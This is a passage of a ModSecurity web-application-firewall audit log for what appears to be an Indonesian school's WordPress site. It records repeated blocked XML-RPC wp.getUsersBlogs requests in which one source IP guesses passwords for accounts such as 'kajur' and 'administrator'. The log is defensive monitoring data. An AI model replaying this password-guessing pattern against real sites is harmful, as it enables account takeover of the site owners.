"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078760928372 5084 (- - -) Stopwatch2: 1745078760928372 5084; combined=3694, p1=429, p2=3088, p3=0, p4=0, p5=103, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6de3f27-Z-- --f6334c40-A-- [19/Apr/2025:23:07:06 +0700] aAPKKg6cTFSgLAHl7PpMzQAAABc 103.236.140.4 60086 103.236.140.4 8181 --f6334c40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f6334c40-C-- wp.getUsersBlogs administrator Bangbang123 --f6334c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6334c40-E-- --f6334c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078826821355 5461 (- - -) Stopwatch2: 1745078826821355 5461; combined=3842, p1=462, p2=3205, p3=0, p4=0, p5=103, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6334c40-Z-- --f7438923-A-- [19/Apr/2025:23:08:06 +0700] aAPKZg6cTFSgLAHl7PpM5QAAAAY 103.236.140.4 60394 103.236.140.4 8181 --f7438923-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f7438923-C-- wp.getUsersBlogs kajur pass --f7438923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7438923-E-- --f7438923-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078886659019 5293 (- - -) Stopwatch2: 1745078886659019 5293; combined=3891, p1=495, p2=3194, p3=0, p4=0, p5=116, sr=129, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7438923-Z-- --f3abdc43-A-- [19/Apr/2025:23:09:10 +0700] aAPKpg6cTFSgLAHl7PpM8QAAABY 103.236.140.4 60730 103.236.140.4 8181 --f3abdc43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3abdc43-C-- wp.getUsersBlogs kajur r007p455w0rd --f3abdc43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3abdc43-E-- --f3abdc43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745078950649812 4761 (- - -) Stopwatch2: 1745078950649812 4761; combined=3707, p1=456, p2=3056, p3=0, p4=0, p5=112, sr=84, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3abdc43-Z-- --54f23740-A-- [19/Apr/2025:23:10:10 +0700] aAPK4nNa4dA2HllpK_PmEwAAAIY 103.236.140.4 32774 103.236.140.4 8181 --54f23740-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --54f23740-C-- wp.getUsersBlogs kajur admin123!@# --54f23740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54f23740-E-- --54f23740-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079010046387 5392 (- - -) Stopwatch2: 1745079010046387 5392; combined=3778, p1=438, p2=3171, p3=0, p4=0, p5=99, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54f23740-Z-- --cd5a5515-A-- [19/Apr/2025:23:11:10 +0700] aAPLHg6cTFSgLAHl7PpNGgAAABc 103.236.140.4 33078 103.236.140.4 8181 --cd5a5515-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd5a5515-C-- wp.getUsersBlogs kajur kajur2009 --cd5a5515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd5a5515-E-- --cd5a5515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079070582046 6071 (- - -) Stopwatch2: 1745079070582046 6071; combined=4264, p1=538, p2=3555, p3=0, p4=0, p5=101, sr=91, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd5a5515-Z-- --6bff9f3e-A-- [19/Apr/2025:23:12:10 +0700] aAPLWg6cTFSgLAHl7PpNNAAAAAw 103.236.140.4 33382 103.236.140.4 8181 --6bff9f3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6bff9f3e-C-- wp.getUsersBlogs kajur p@ssw0rd --6bff9f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bff9f3e-E-- --6bff9f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079130189595 4331 (- - -) Stopwatch2: 1745079130189595 4331; combined=3274, p1=365, p2=2737, p3=0, p4=0, p5=100, sr=80, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bff9f3e-Z-- --9ad7e62c-A-- [19/Apr/2025:23:13:10 +0700] aAPLlg6cTFSgLAHl7PpNUQAAAAA 103.236.140.4 33700 103.236.140.4 8181 --9ad7e62c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9ad7e62c-C-- wp.getUsersBlogs kajur 112233 --9ad7e62c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ad7e62c-E-- --9ad7e62c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079190872959 5421 (- - -) Stopwatch2: 1745079190872959 5421; combined=3899, p1=477, p2=3188, p3=0, p4=0, p5=135, sr=112, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ad7e62c-Z-- --c6180255-A-- [19/Apr/2025:23:14:11 +0700] aAPL00ruoUXZj665VUFxJQAAANY 103.236.140.4 34012 103.236.140.4 8181 --c6180255-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6180255-C-- wp.getUsersBlogs kajur du7p72w5 --c6180255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6180255-E-- --c6180255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079251310933 4745 (- - -) Stopwatch2: 1745079251310933 4745; combined=3545, p1=424, p2=2956, p3=0, p4=0, p5=97, sr=76, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6180255-Z-- --54fde55f-A-- [19/Apr/2025:23:15:13 +0700] aAPMEUruoUXZj665VUFxPgAAAMA 103.236.140.4 34304 103.236.140.4 8181 --54fde55f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --54fde55f-C-- wp.getUsersBlogs kajur kajur@1999 --54fde55f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54fde55f-E-- --54fde55f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079313577325 5382 (- - -) Stopwatch2: 1745079313577325 5382; combined=3789, p1=447, p2=3135, p3=0, p4=0, p5=132, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54fde55f-Z-- --2ba16b33-A-- [19/Apr/2025:23:16:29 +0700] aAPMXXNa4dA2HllpK_PmsQAAAIs 103.236.140.4 34668 103.236.140.4 8181 --2ba16b33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2ba16b33-C-- wp.getUsersBlogs kajur Marketing2015 --2ba16b33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ba16b33-E-- --2ba16b33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079389240559 4923 (- - -) Stopwatch2: 1745079389240559 4923; combined=3839, p1=441, p2=3221, p3=0, p4=0, p5=104, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ba16b33-Z-- --4f2de214-A-- [19/Apr/2025:23:17:36 +0700] aAPMoEruoUXZj665VUFxcQAAANg 103.236.140.4 35012 103.236.140.4 8181 --4f2de214-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4f2de214-C-- wp.getUsersBlogs kajur kajur@1987 --4f2de214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f2de214-E-- --4f2de214-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079456025708 5280 (- - -) Stopwatch2: 1745079456025708 5280; combined=3722, p1=447, p2=3107, p3=0, p4=0, p5=99, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f2de214-Z-- --4037f74a-A-- [19/Apr/2025:23:18:39 +0700] aAPM33Na4dA2HllpK_Pm7wAAAJc 103.236.140.4 35320 103.236.140.4 8181 --4037f74a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4037f74a-C-- wp.getUsersBlogs kajur marketing2024_ --4037f74a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4037f74a-E-- --4037f74a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079519373919 5322 (- - -) Stopwatch2: 1745079519373919 5322; combined=3804, p1=477, p2=3148, p3=0, p4=0, p5=104, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4037f74a-Z-- --400c857f-A-- [19/Apr/2025:23:19:41 +0700] aAPNHQ6cTFSgLAHl7PpN1gAAABM 103.236.140.4 35614 103.236.140.4 8181 --400c857f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --400c857f-C-- wp.getUsersBlogs kajur pwd123 --400c857f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --400c857f-E-- --400c857f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079581242593 5117 (- - -) Stopwatch2: 1745079581242593 5117; combined=3647, p1=441, p2=3030, p3=0, p4=0, p5=102, sr=88, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --400c857f-Z-- --ca900371-A-- [19/Apr/2025:23:20:42 +0700] aAPNWkruoUXZj665VUFxlwAAAMU 103.236.140.4 35906 103.236.140.4 8181 --ca900371-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ca900371-C-- wp.getUsersBlogs kajur scotland --ca900371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca900371-E-- --ca900371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079642402882 5294 (- - -) Stopwatch2: 1745079642402882 5294; combined=4182, p1=515, p2=3494, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca900371-Z-- --0355e725-A-- [19/Apr/2025:23:21:45 +0700] aAPNmQ6cTFSgLAHl7PpOBwAAAA0 103.236.140.4 36218 103.236.140.4 8181 --0355e725-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0355e725-C-- wp.getUsersBlogs kajur casper --0355e725-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0355e725-E-- --0355e725-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745079705091405 5947 (- - -) Stopwatch2: 1745079705091405 5947; combined=4141, p1=535, p2=3415, p3=0, p4=0, p5=112, sr=93, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0355e725-Z-- --ced09e29-A-- [19/Apr/2025:23:22:47 +0700] aAPN1w6cTFSgLAHl7PpOGwAAAAM 103.236.140.4 36542 103.236.140.4 8181 --ced09e29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: 